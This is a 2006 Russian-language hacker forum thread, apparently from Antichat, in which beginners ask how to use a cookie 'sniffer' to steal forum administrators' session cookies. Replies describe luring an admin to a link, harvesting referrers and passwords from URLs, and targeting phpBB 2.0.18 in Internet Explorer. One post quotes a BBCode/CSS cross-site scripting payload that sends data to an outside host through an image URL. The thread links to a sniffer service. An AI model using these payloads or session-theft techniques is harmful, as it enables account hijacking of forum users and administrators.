Простой вопрос про сниффер

Discussion in 'PHP' started by errou, 28 Jan 2006.

  1. errou

    errou New Member

    Joined:
    27 Jan 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Народ, такой вопрос:
    Сниффером мы можем получать куки. Но только куки того процесса, где был выполнен Джаваскрипт. Следовательно, для использования сниффера, в любом случае требуется искать уязвимость, пропускающую Джаваскрипт?
    Тогда не очень ясен один вопрос - в статье про снифферы на Античате, неточно помню, был описан такой прием получения админских куков на форуме, как просьба посмотреть неоткрывающийся аватар (в котором сидит Js). Админу дается ссылка, и просится на нее зайти.
    Но вель тогда сниффер получит куки, которые относятся к новому открытому документу - странице с картинкой, и толку от этого никакого.
    То есть, главный вопрос:
    Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js?
     
  2. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    Можно, его использовать для получения реффера (тоесть адреса, с которого зашел чел на сниффер). Так можно воровать сессии. А бывают и такие чаты, или еще ченить, где в дресе пишется
    http://site/chat/?userId=1234&room=3&pwd=qwerty
    Из этой строки можно узнать пароль ))))))))))))))))))))))
     
  3. errou

    errou New Member

    Joined:
    27 Jan 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Спасибо.
     
  4. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    чтобы не создавать тему спрашиваю здесь....

    когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???

    очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
    сасое большое, что я получаю, это ip адрес...
     
  5. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    Ха-ха-ха-ха.... Я ща умру от смеха))))
    Где ты в JS видел такое??? Например:
    Code:
    [HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL][/color]` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/nofear/pic.gif?;"[B]+админ@yandex.ru.txt[/B])`
    Если это щас увидят знающие люди, они сдохнут со смеха )))
     
    #5 sssssssssssq, 29 Jan 2006
    Last edited: 29 Jan 2006
  6. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Мдаааааааааа!!!

    Ты вообще сам понял, что спросил! И че ты надеялся получить если бы ты написал вместо document.cookie -
    админ@yandex.ru.txt. Немного подумав я сделал вывод что ты видимо хотел получить некий файл админ@yandex.ru.txt или файл админа с yandex.ru под названием yandex.ru.txt, ХА ХА ХА!!! ОБЛОМИСЬ ИМХО!!! =)

    Ну и не получиться!
    Честно говоря с первого раза я не понял этого предложения =).
    Поверь мне ты получишь не только ip адресс, хотя..... наверное ТЫ ничего не получишь.....

    УЧИ МАТ ЧАСТЬ, ИМХО!!!!!!!!
     
  7. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    СДОХНУТЬ МОЖНО!!!!!!!!!!)))))))))))))))))))))))))))))))))))))))))))))))))))))))) ну и ЛОЛЛЛЛЛЛЛЛЛ

    когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???
    [​IMG]
     
  8. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    ну хорошо, лоханулся....

    а в чем тогда проблема??? я даже на себе проверял.....пишу я нужный код, с помощью кодера (ну, ссылки на них где-то давали).....в сообщении оставляю ссылку, сам кликаю и на снифак приходит только Ip адрес жертвы....

    что делать....ну помогите начинающему...все же когда-то были такими....
     
  9. TTyck

    TTyck Elder - Старейшина

    Joined:
    12 Nov 2005
    Messages:
    91
    Likes Received:
    41
    Reputations:
    11
    НА чем ты тестишь? НА форуме? Движок и версия какая?
     
  10. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    да на форумах.....phpbb 2.0.18 или fastbb (версию не помню, но не самаЯ последняя, где-то предпоследняя...)
     
  11. TTyck

    TTyck Elder - Старейшина

    Joined:
    12 Nov 2005
    Messages:
    91
    Likes Received:
    41
    Reputations:
    11
  12. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    ТОЛЬКО в ОСЛИКЕ ?
    в eMule что ли???
     
  13. errou

    errou New Member

    Joined:
    27 Jan 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Это стеб?
    Осел - IE - Internet Explorer
     
  14. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    ой бля, пополу катался
     
  15. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Вы чего - прям все родились с компом в руках? Он в этом не разбирается, зато, наверное, разбирается в пусковой части какого-нить психофазатрона альфа-частиц на молекулярном уровне... Лучше бы в двух постах объяснили на пальцах что такое снифер и зачем он.
     
    _________________________
  16. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    http://antichat.ru/sniff/ вот тут объсняют популярно что такое сниффер)))там ещё есть сам сниффер и даже лог)))